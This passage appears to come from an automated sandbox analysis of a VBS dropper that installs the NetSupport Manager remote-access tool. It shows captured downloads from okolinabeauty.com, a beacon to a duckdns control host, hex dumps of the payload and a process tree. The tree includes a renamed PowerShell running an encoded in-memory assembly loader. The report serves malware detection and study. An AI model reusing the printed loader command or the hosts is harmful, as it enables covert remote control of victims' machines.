                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: t/rFRPn4/Z36JS4yFXLvCXii1Lk=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        24192.168.11.2049770185.170.144.661773
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 23, 2024 02:55:44.056868076 CET203OUTGET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: wFD9YmzoAR4jGxbs8QMbCQ==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:44.268524885 CET129INHTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: wxo9Cb7p9/iFsmFzvf2v1nx9vvQ=


                                                                                        HTTPS Proxied Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.11.2049742176.126.113.1664432216C:\Windows\SysWOW64\wscript.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-23 01:53:40 UTC334OUTGET /choh/NSM.lic HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en-GB;q=0.7,en;q=0.3
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                        Host: okolinabeauty.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-11-23 01:53:40 UTC240INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Sat, 23 Nov 2024 01:53:40 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 253
                                                                                        Last-Modified: Tue, 12 Nov 2024 14:38:33 GMT
                                                                                        Connection: close
                                                                                        ETag: "67336869-fd"
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-23 01:53:40 UTC253INData Raw: 31 34 30 30 0d 0a 30 78 39 38 66 31 37 37 64 62 0d 0a 0d 0a 3b 20 4e 65 74 53 75 70 70 6f 72 74 20 4c 69 63 65 6e 73 65 20 46 69 6c 65 2e 0d 0a 3b 20 47 65 6e 65 72 61 74 65 64 20 6f 6e 20 30 32 3a 35 39 20 2d 20 31 35 2f 30 39 2f 32 30 32 32 0d 0a 0d 0a 0d 0a 0d 0a 5b 5b 45 6e 66 6f 72 63 65 5d 5d 0d 0a 0d 0a 5b 5f 4c 69 63 65 6e 73 65 5d 0d 0a 63 6f 6e 74 72 6f 6c 5f 6f 6e 6c 79 3d 30 0d 0a 65 78 70 69 72 79 3d 0d 0a 69 6e 61 63 74 69 76 65 3d 30 0d 0a 6c 69 63 65 6e 73 65 65 3d 4e 53 4d 31 32 33 34 0d 0a 6d 61 78 73 6c 61 76 65 73 3d 39 39 39 39 0d 0a 6f 73 32 3d 31 0d 0a 70 72 6f 64 75 63 74 3d 31 30 0d 0a 73 65 72 69 61 6c 5f 6e 6f 3d 4e 53 4d 31 32 33 34 0d 0a 73 68 72 69 6e 6b 5f 77 72 61 70 3d 30 0d 0a 74 72 61 6e 73 70 6f 72 74 3d 30 0d 0a
                                                                                        Data Ascii: 14000x98f177db; NetSupport License File.; Generated on 02:59 - 15/09/2022[[Enforce]][_License]control_only=0expiry=inactive=0licensee=NSM1234maxslaves=9999os2=1product=10serial_no=NSM1234shrink_wrap=0transport=0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.11.2049743176.126.113.1664432216C:\Windows\SysWOW64\wscript.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-23 01:53:40 UTC339OUTGET /choh/Client32.ini HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en-GB;q=0.7,en;q=0.3
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                        Host: okolinabeauty.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-11-23 01:53:41 UTC241INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Sat, 23 Nov 2024 01:53:40 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 837
                                                                                        Last-Modified: Tue, 12 Nov 2024 14:38:33 GMT
                                                                                        Connection: close
                                                                                        ETag: "67336869-345"
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-23 01:53:41 UTC837INData Raw: 30 78 61 37 63 64 37 33 64 38 0d 0a 0d 0a 5b 43 6c 69 65 6e 74 5d 0d 0a 5f 70 72 65 73 65 6e 74 3d 31 0d 0a 44 69 73 61 62 6c 65 43 68 61 74 3d 31 0d 0a 44 69 73 61 62 6c 65 43 68 61 74 4d 65 6e 75 3d 31 0d 0a 44 69 73 61 62 6c 65 43 6c 69 65 6e 74 43 6f 6e 6e 65 63 74 3d 31 0d 0a 44 69 73 61 62 6c 65 43 6c 6f 73 65 41 70 70 73 3d 30 0d 0a 44 69 73 61 62 6c 65 44 69 73 63 6f 6e 6e 65 63 74 3d 31 0d 0a 44 69 73 61 62 6c 65 4c 6f 63 61 6c 49 6e 76 65 6e 74 6f 72 79 3d 31 0d 0a 44 69 73 61 62 6c 65 4d 61 6e 61 67 65 53 65 72 76 69 63 65 73 3d 30 0d 0a 44 69 73 61 62 6c 65 4d 65 73 73 61 67 65 3d 31 0d 0a 44 69 73 61 62 6c 65 52 65 70 6c 61 79 4d 65 6e 75 3d 31 0d 0a 44 69 73 61 62 6c 65 52 65 71 75 65 73 74 48 65 6c 70 3d 31 0d 0a 49 67 6e 6f 72 65 42 72 6f
                                                                                        Data Ascii: 0xa7cd73d8[Client]_present=1DisableChat=1DisableChatMenu=1DisableClientConnect=1DisableCloseApps=0DisableDisconnect=1DisableLocalInventory=1DisableManageServices=0DisableMessage=1DisableReplayMenu=1DisableRequestHelp=1IgnoreBro


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.11.2049744176.126.113.1664432216C:\Windows\SysWOW64\wscript.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-23 01:53:41 UTC335OUTGET /choh/vrep.msi HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en-GB;q=0.7,en;q=0.3
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                        Host: okolinabeauty.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-11-23 01:53:41 UTC250INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Sat, 23 Nov 2024 01:53:41 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 41645568
                                                                                        Last-Modified: Tue, 12 Nov 2024 14:38:35 GMT
                                                                                        Connection: close
                                                                                        ETag: "6733686b-27b7600"
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-23 01:53:41 UTC16134INData Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 03 00 fe ff 09 00 06 00 00 00 00 00 00 00 00 00 00 00 7c 02 00 00 01 00 00 00 00 00 00 00 00 10 00 00 38 00 00 00 09 00 00 00 80 36 00 00 05 00 00 00 00 00 00 00 80 00 00 00 00 01 00 00 7f 01 00 00 00 02 00 00 7f 02 00 00 00 03 00 00 7f 03 00 00 ff 03 00 00 80 04 00 00 00 05 00 00 80 05 00 00 ff 05 00 00 80 06 00 00 ff 06 00 00 80 07 00 00 ff 07 00 00 80 08 00 00 ff 08 00 00 7f 09 00 00 00 0a 00 00 7f 0a 00 00 00 0b 00 00 7f 0b 00 00 00 0c 00 00 7f 0c 00 00 00 0d 00 00 7f 0d 00 00 ff 0d 00 00 80 0e 00 00 ff 0e 00 00 80 0f 00 00 ff 0f 00 00 80 10 00 00 ff 10 00 00 80 11 00 00 ff 11 00 00 80 12 00 00 ff 12 00 00 80 13 00 00 ff 13 00 00 80 14 00 00 ff 14 00 00 80 15 00 00 ff 15 00
                                                                                        Data Ascii: >|86
                                                                                        2024-11-23 01:53:41 UTC16384INData Raw: 65 73 20 75 6e 64 65 72 20 77 68 69 63 68 20 63 6f 6e 64 69 74 69 6f 6e 73 20 74 68 65 20 61 63 74 69 6f 6e 20 73 68 6f 75 6c 64 20 62 65 20 74 72 69 67 67 65 72 65 64 2e 41 6e 20 69 6e 74 65 67 65 72 20 75 73 65 64 20 74 6f 20 6f 72 64 65 72 20 73 65 76 65 72 61 6c 20 65 76 65 6e 74 73 20 74 69 65 64 20 74 6f 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 6f 6c 2e 20 43 61 6e 20 62 65 20 6c 65 66 74 20 62 6c 61 6e 6b 2e 41 20 66 6f 72 65 69 67 6e 20 6b 65 79 20 74 6f 20 74 68 65 20 43 6f 6e 74 72 6f 6c 20 74 61 62 6c 65 2c 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 63 6f 6e 74 72 6f 6c 41 6e 20 69 64 65 6e 74 69 66 69 65 72 20 74 68 61 74 20 73 70 65 63 69 66 69 65 73 20 74 68 65 20 74 79 70 65 20 6f 66 20 74 68 65 20 65 76 65 6e 74 20 74 68 61 74 20 73 68 6f
                                                                                        Data Ascii: es under which conditions the action should be triggered.An integer used to order several events tied to the same control. Can be left blank.A foreign key to the Control table, name of the controlAn identifier that specifies the type of the event that sho
                                                                                        2024-11-23 01:53:42 UTC16384INData Raw: 61 83 5c 83 75 83 6e 83 5d 83 5f 83 67 83 66 83 55 83 5b 83 ec 85 06 80 01 99 07 80 b6 83 d6 86 bc 82 52 83 04 99 c2 81 15 00 67 00 01 00 7d 00 01 00 9f 00 07 00 36 00 01 00 37 00 5f 00 41 04 42 04 43 04 4c 04 4d 04 4e 04 4f 04 50 04 51 04 60 04 6a 04 6e 04 70 04 82 04 95 04 a2 04 b3 04 b4 04 b5 04 b6 04 b7 04 b9 04 ba 04 bb 04 bd 04 be 04 c3 04 c4 04 c5 04 c6 04 ca 04 cc 04 cd 04 d1 04 d3 04 d6 04 da 04 dc 04 de 04 e0 04 e1 04 e3 04 e5 04 e8 04 ea 04 ec 04 ed 04 ef 04 fc 04 fd 04 fe 04 ff 04 00 05 02 05 03 05 07 05 09 05 0b 05 0d 05 0e 05 0f 05 10 05 11 05 12 05 13 05 14 05 15 05 16 05 17 05 18 05 19 05 1a 05 1b 05 1c 05 1d 05 1e 05 1f 05 20 05 21 05 22 05 23 05 24 05 25 05 27 05 29 05 2b 05 30 05 32 05 34 05 38 05 3b 05 3d 05 3f 05 41 05 43 05 45 05 47
                                                                                        Data Ascii: a\un]_gfU[Rg}67_ABCLMNOPQ`jnp !"#$%')+0248;=?ACEG
                                                                                        2024-11-23 01:53:42 UTC16384INData Raw: 34 36 44 41 2d 38 46 38 46 2d 33 44 45 39 30 38 37 38 36 41 38 41 7d 68 74 63 74 6c 33 32 2e 64 6c 6c 7b 36 41 42 39 32 46 39 44 2d 35 38 43 45 2d 34 37 32 39 2d 42 45 30 46 2d 46 46 33 43 31 31 38 31 41 44 43 35 7d 69 63 6f 76 69 65 77 65 72 2e 64 6c 6c 7b 42 32 44 33 37 33 30 41 2d 38 39 41 36 2d 34 31 33 45 2d 38 34 43 45 2d 34 30 35 36 33 32 36 37 38 38 30 35 7d 7b 41 30 32 45 31 44 38 43 2d 36 33 34 44 2d 34 31 39 37 2d 39 36 37 31 2d 31 32 38 30 30 43 31 35 37 38 33 35 7d 69 73 6d 65 74 72 6f 2e 65 78 65 7b 38 36 38 43 37 35 37 37 2d 45 35 39 36 2d 34 46 34 36 2d 41 45 39 32 2d 34 33 44 30 33 39 33 41 33 34 37 39 7d 6c 6f 67 6f 2e 70 6e 67 31 7b 32 32 44 41 37 31 34 37 2d 38 43 41 44 2d 34 33 45 32 2d 38 37 43 38 2d 46 46 34 32 46 34 45 42 33 39 33
                                                                                        Data Ascii: 46DA-8F8F-3DE908786A8A}htctl32.dll{6AB92F9D-58CE-4729-BE0F-FF3C1181ADC5}icoviewer.dll{B2D3730A-89A6-413E-84CE-405632678805}{A02E1D8C-634D-4197-9671-12800C157835}ismetro.exe{868C7577-E596-4F46-AE92-43D0393A3479}logo.png1{22DA7147-8CAD-43E2-87C8-FF42F4EB393
                                                                                        2024-11-23 01:53:42 UTC16384INData Raw: 74 61 6c 6c 69 6e 67 20 43 4f 4d 2b 20 61 70 70 6c 69 63 61 74 69 6f 6e 3a 20 5b 31 5d 49 53 5f 43 4f 4d 50 4c 55 53 5f 50 52 4f 47 52 45 53 53 54 45 58 54 5f 43 4f 53 54 55 6e 69 6e 73 74 61 6c 6c 69 6e 67 20 43 4f 4d 2b 20 61 70 70 6c 69 63 61 74 69 6f 6e 3a 20 5b 31 5d 49 53 5f 43 4f 4d 50 4c 55 53 5f 50 52 4f 47 52 45 53 53 54 45 58 54 5f 49 4e 53 54 41 4c 4c 43 6f 73 74 69 6e 67 20 58 4d 4c 20 66 69 6c 65 73 2e 2e 2e 49 53 5f 43 4f 4d 50 4c 55 53 5f 50 52 4f 47 52 45 53 53 54 45 58 54 5f 55 4e 49 4e 53 54 41 4c 4c 43 72 65 61 74 69 6e 67 20 58 4d 4c 20 66 69 6c 65 20 25 73 2e 2e 2e 49 53 5f 50 52 4f 47 4d 53 47 5f 58 4d 4c 5f 43 4f 53 54 49 4e 47 50 65 72 66 6f 72 6d 69 6e 67 20 58 4d 4c 20 66 69 6c 65 20 63 68 61 6e 67 65 73 2e 2e 2e 49 53 5f 50 52
                                                                                        Data Ascii: talling COM+ application: [1]IS_COMPLUS_PROGRESSTEXT_COSTUninstalling COM+ application: [1]IS_COMPLUS_PROGRESSTEXT_INSTALLCosting XML files...IS_COMPLUS_PROGRESSTEXT_UNINSTALLCreating XML file %s...IS_PROGMSG_XML_COSTINGPerforming XML file changes...IS_PR
                                                                                        2024-11-23 01:53:42 UTC16384INData Raw: 6f 6d 6d 65 6e 74 65 64 20 6f 75 74 2e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 46 72 6f 6d 46 69 6c 65 20 3d 20 73 65 73 73 69 6f 6e 2e 50 72 6f 70 65 72 74 79 28 20 22 43 6f 6d 6d 6f 6e 46 69 6c 65 73 46 6f 6c 64 65 72 22 20 29 20 2b 20 22 4e 53 4c 5c 43 6f 6e 6e 65 63 74 69 76 69 74 79 20 53 65 72 76 65 72 5c 67 61 74 65 77 61 79 2e 64 62 22 0d 0a 54 6f 46 69 6c 65 20 3d 20 73 65 73 73 69 6f 6e 2e 50 72 6f 70 65 72 74 79 28 20 22 53 55 50 50 4f 52 54 44 49 52 22 20 29 20 2b 20 22 5c 67 61 74 65 77 61 79 2e 64 62 22 0d 0a 20 20 20 20 20 0d 0a 27 53 65 74 20 6f 62 6a 46 53 4f 20 3d 20 53 65 72 76 65 72 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 53 63 72 69 16 00 01 00 31
                                                                                        Data Ascii: ommented out. FromFile = session.Property( "CommonFilesFolder" ) + "NSL\Connectivity Server\gateway.db"ToFile = session.Property( "SUPPORTDIR" ) + "\gateway.db" 'Set objFSO = Server.CreateObject("Scri1
                                                                                        2024-11-23 01:53:42 UTC16384INData Raw: 20 89 07 8d 88 00 01 00 00 3b c1 73 18 80 60 04 00 83 08 ff c6 40 05 0a 8b 0f 83 c0 08 81 c1 00 01 00 00 eb e4 83 c7 04 39 35 c0 89 40 00 7c bb eb 06 8b 35 c0 89 40 00 33 ff 85 f6 7e 46 8b 03 83 f8 ff 74 36 8a 4d 00 f6 c1 01 74 2e f6 c1 08 75 0b 50 ff 15 40 50 40 00 85 c0 74 1e 8b c7 8b cf c1 f8 05 83 e1 1f 8b 04 85 c0 88 40 00 8d 04 c8 8b 0b 89 08 8a 4d 00 88 48 04 47 45 83 c3 04 3b fe 7c ba 33 db a1 c0 88 40 00 83 3c d8 ff 8d 34 d8 75 4d 85 db c6 46 04 81 75 05 6a f6 58 eb 0a 8b c3 48 f7 d8 1b c0 83 c0 f5 50 ff 15 3c 50 40 00 8b f8 83 ff ff 74 17 57 ff 15 40 50 40 00 85 c0 74 0c 25 ff 00 00 00 89 3e 83 f8 02 75 06 80 4e 04 40 eb 0f 83 f8 03 75 0a 80 4e 04 08 eb 04 80 4e 04 80 43 83 fb 03 7c 9b ff 35 c0 89 40 00 ff 15 38 50 40 00 5f 5e 5d 5b 83 c4 44 c3
                                                                                        Data Ascii: ;s`@95@|5@3~Ft6Mt.uP@P@t@MHGE;|3@<4uMFujXHP<P@tW@P@t%>uN@uNNC|5@8P@_^][D
                                                                                        2024-11-23 01:53:42 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii:
                                                                                        2024-11-23 01:53:42 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii:
                                                                                        2024-11-23 01:53:42 UTC16384INData Raw: 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 50 50 51 ff 77 77 78 ff 86 8a 90 ff 93 6e 45 ff c9 82 33 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 7f 35 ff c0 7c 31 ff ef dd ca ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f9 f2 ea ff c7 88 42 ff c1 7d 32 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2
                                                                                        Data Ascii: VUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVPPQwwxnE36666666666666666665|1B}266666


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:20:53:32
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs"
                                                                                        Imagebase:0x7ff7b6630000
                                                                                        File size:170'496 bytes
                                                                                        MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:2
                                                                                        Start time:20:53:34
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Pyyidau.vbs.exe" /Y
                                                                                        Imagebase:0x7ff71cca0000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:3
                                                                                        Start time:20:53:34
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7c7080000
                                                                                        File size:875'008 bytes
                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:4
                                                                                        Start time:20:53:36
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Users\user\Desktop\Pyyidau.vbs.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc JABBAHEAdwB3AHMAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABHAHkAaQBlAHAAZwBrAHcAdgByACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQQBxAHcAdwBzAGMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAeQBpAGUAcABnAGsAdwB2AHIALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEkAdwBxAGIAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAIAApADsAJABFAG0AYgBtAGUAcwBqAHMAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAUgB3AHAAdQB4AHcAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABJAHcAcQBiAHcAYwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbwBwAHkAVABvACgAIAAkAEUAbQBiAG0AZQBzAGoAcwBsACAAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbABvAHMAZQAoACkAOwAkAEkAdwBxAGIAdwBjAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgACQARQBtAGIAbQBlAHMAagBzAGwALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFgAcwBsAG0AdwBtAG8AcQBnAGsAegApADsAIAAkAE4AZgBrAGYAZwB0AHQAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABoAHIAZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBHAGUAdABEAG8AbQBhAGkAbgAoACkALgBMAG8AYQBkACgAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAKQA7ACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0AIAA9ACAAJABOAGYAawBmAGcAdAB0AHIALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEEAdgBmAG4AeAB1AGsAbgByAG0AbQAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
                                                                                        Imagebase:0xc50000
                                                                                        File size:433'152 bytes
                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.113950407001.00000000051F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.114071601161.000000000FC00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 0%, ReversingLabs
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:20:53:36
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7c7080000
                                                                                        File size:875'008 bytes
                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:6
                                                                                        Start time:20:53:37
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs"
                                                                                        Imagebase:0xf80000
                                                                                        File size:147'456 bytes
                                                                                        MD5 hash:4D780D8F77047EE1C65F747D9F63A1FE
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
